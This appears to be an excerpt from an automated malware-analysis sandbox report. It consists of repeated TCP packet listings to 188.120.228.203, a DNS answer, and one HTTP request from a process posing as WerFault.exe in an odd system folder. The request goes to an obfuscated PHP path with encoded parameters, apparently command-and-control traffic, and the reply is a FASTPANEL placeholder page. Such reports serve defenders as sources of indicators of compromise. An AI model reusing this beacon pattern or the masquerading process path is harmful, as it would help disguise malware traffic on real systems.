                                              Nov 27, 2024 04:02:07.712311983 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712337017 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712476015 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712551117 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:07.712554932 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712569952 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712650061 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712698936 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:07.712721109 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:07.712729931 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712806940 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712817907 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712830067 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.712886095 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:07.712886095 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:07.833177090 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.877996922 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:07.922651052 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:07.927748919 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:08.047686100 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.378654003 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.378684044 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.378747940 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:08.382698059 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.385123014 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.385178089 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.385179996 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:08.393502951 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.393563986 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:08.393606901 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.401941061 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.402002096 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:08.402038097 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.410280943 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.410347939 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:08.588783979 CET8049723188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:08.643434048 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:08.664591074 CET4972380192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:15.986710072 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:16.106806993 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:16.106945992 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:16.107333899 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:16.227278948 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.428755045 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.428841114 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.428879023 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.428898096 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.429060936 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.429070950 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.429083109 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.429092884 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.429100990 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.429122925 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.429294109 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.429339886 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.429363012 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.429378986 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.429414988 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.548954010 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.549043894 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.549089909 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.553106070 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.596565962 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.620759010 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:17.623728037 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:17.743735075 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.055687904 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.056252956 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.056304932 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:18.056340933 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.061096907 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.061155081 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:18.061198950 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.069591045 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.069637060 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:18.069802999 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.077878952 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.077929020 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:18.077975988 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.086262941 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.086350918 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:18.086374044 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.094616890 CET8049746188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:18.094666958 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:18.095801115 CET4974680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:24.054023027 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:24.174032927 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:24.174199104 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:24.174798965 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:24.294722080 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553308964 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553406000 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553419113 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553488016 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:25.553567886 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553580999 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553594112 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553622961 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:25.553668976 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:25.553744078 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553755999 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553769112 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553782940 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.553805113 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:25.553836107 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:25.673710108 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.673768044 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:25.673877001 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:25.676346064 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:25.796761036 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.124521017 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.124706984 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.124787092 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:26.128654003 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.128818035 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.128882885 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:26.137125969 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.140943050 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.141005039 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:26.141062021 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.149382114 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.149477005 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:26.149558067 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.157704115 CET8049767188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:26.157773972 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:26.159202099 CET4976780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:31.877506971 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:31.997481108 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:31.997565031 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:31.998044968 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:32.117995977 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.365844011 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.365963936 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366022110 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366034985 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366043091 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.366075039 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.366108894 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366122007 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366132975 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366143942 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366163015 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.366173983 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.366302967 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366321087 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.366369963 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.486138105 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.486196041 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.486284018 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.490237951 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.534107924 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.566992998 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:33.584337950 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:33.704288006 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.027124882 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.027586937 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.027641058 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.027751923 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.032632113 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.032727957 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.032795906 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.040719032 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.040765047 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.041011095 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.049268007 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.049282074 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.049313068 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.057667017 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.057712078 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.057827950 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.066200018 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.066246986 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:34.227293968 CET8049785188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:34.229443073 CET4978580192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.163245916 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.537560940 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:41.537657976 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.538192987 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:41.658508062 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961347103 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961366892 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961410046 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961421013 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961431980 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961483955 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961482048 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:42.961498022 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961534023 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:42.961548090 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961585045 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961585999 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:42.961666107 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:42.961720943 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.081641912 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.088160038 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.088216066 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.101278067 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.103537083 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.223546982 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.559287071 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.559566975 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.559633970 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.559851885 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.568002939 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.568046093 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.568176985 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.576486111 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.576523066 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.576535940 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.584856987 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.584908962 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.584939957 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.593413115 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.593426943 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.593499899 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:43.769428968 CET8049806188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:43.770958900 CET4980680192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.674061060 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.794076920 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:49.794215918 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.794919968 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:49.914830923 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.178966999 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.178983927 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.178996086 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179050922 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179064035 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179076910 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179089069 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179100990 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179124117 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179160118 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179264069 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179275990 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179291010 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.179306030 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.179331064 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.379973888 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.382492065 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.502360106 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.843673944 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.843702078 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.843909979 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.847856998 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.847980022 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.848030090 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.856251001 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.856324911 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.856369972 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.864661932 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.864775896 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.864821911 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.873078108 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.873307943 CET8049827188.120.228.203192.168.2.9
                                              Nov 27, 2024 04:02:51.873352051 CET4982780192.168.2.9188.120.228.203
                                              Nov 27, 2024 04:02:51.874850988 CET4982780192.168.2.9188.120.228.203

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 27, 2024 04:01:57.871406078 CET1.1.1.1192.168.2.90x6a7fNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Nov 27, 2024 04:01:57.871406078 CET1.1.1.1192.168.2.90x6a7fNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • 188.120.228.203

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.949723188.120.228.203807604C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 27, 2024 04:02:06.299420118 CET765OUTGET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1
                                              Accept: */*
                                              Content-Type: text/css
                                              User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1
                                              Host: 188.120.228.203
                                              Connection: Keep-Alive
                                              Nov 27, 2024 04:02:07.712311983 CET1236INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0
                                              Date: Wed, 27 Nov 2024 03:02:07 GMT
                                              Content-Type: text/html
                                              Content-Length: 11694
                                              Last-Modified: Wed, 11 Sep 2024 10:54:53 GMT
                                              Connection: keep-alive
                                              ETag: "66e176fd-2dae"
                                              Accept-Ranges: bytes
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-width:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-color:#000}button,input,textarea{font-family:Roboto;font-size:inherit;line-height:inherit;color:inherit;background-color:rgba(0,0,0,0)}input,textarea{width:
                                              Nov 27, 2024 04:02:07.712337017 CET465INData Raw: 31 30 30 25 7d 62 75 74 74 6f 6e 2c 6f 70 74 69 6f 6e 2c 73 65 6c 65 63 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 75 6c 20 6c
                                              Data Ascii: 100%}button,option,select{cursor:pointer}a{color:inherit;text-decoration:none}ul li{list-style:none}img{vertical-align:top}h1,h2,h3,h4,h5,h6{font-weight:inherit;font-size:inherit}.lock body{overflow:hidden;touch-action:none;-ms-scroll-chaining
                                              Nov 27, 2024 04:02:07.712476015 CET1236INData Raw: 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 76 77 3b 70 61 64 64 69 6e 67 3a 31 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69
                                              Data Ascii: r;justify-content:center;min-height:100vh;min-width:100vw;padding:1rem}.window-main{background-color:#13151a;border-radius:.75rem;max-width:45.625rem}.window-main .svg-one{position:absolute;top:-240px;right:-360px;z-index:-1}.window-main .svg-
                                              Nov 27, 2024 04:02:07.712554932 CET1236INData Raw: 64 64 69 6e 67 3a 33 2e 37 35 72 65 6d 20 38 2e 39 33 37 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 62 6f 64 79 7b 66
                                              Data Ascii: dding:3.75rem 8.9375rem}.window-main__title{font-size:2.25rem}.window-main__body{font-size:1.0625rem}.window-main__info{margin-bottom:1.875rem}.window-main__list{padding-left:.6875rem}.window-main__item{padding-left:.875rem}}@media (max-width:
                                              Nov 27, 2024 04:02:07.712569952 CET1236INData Raw: 70 28 31 2e 35 72 65 6d 20 2c 2d 34 2e 33 30 34 38 37 38 30 34 38 38 72 65 6d 20 2b 20 32 39 2e 30 32 34 33 39 30 32 34 33 39 76 77 20 2c 38 2e 39 33 37 35 72 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 72 69 67
                                              Data Ascii: p(1.5rem ,-4.3048780488rem + 29.0243902439vw ,8.9375rem)){.window-main{padding-right:calc(1.5rem + 7.4375*(100vw - 20rem)/ 25.625)}}@supports (padding-top:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-top:clamp
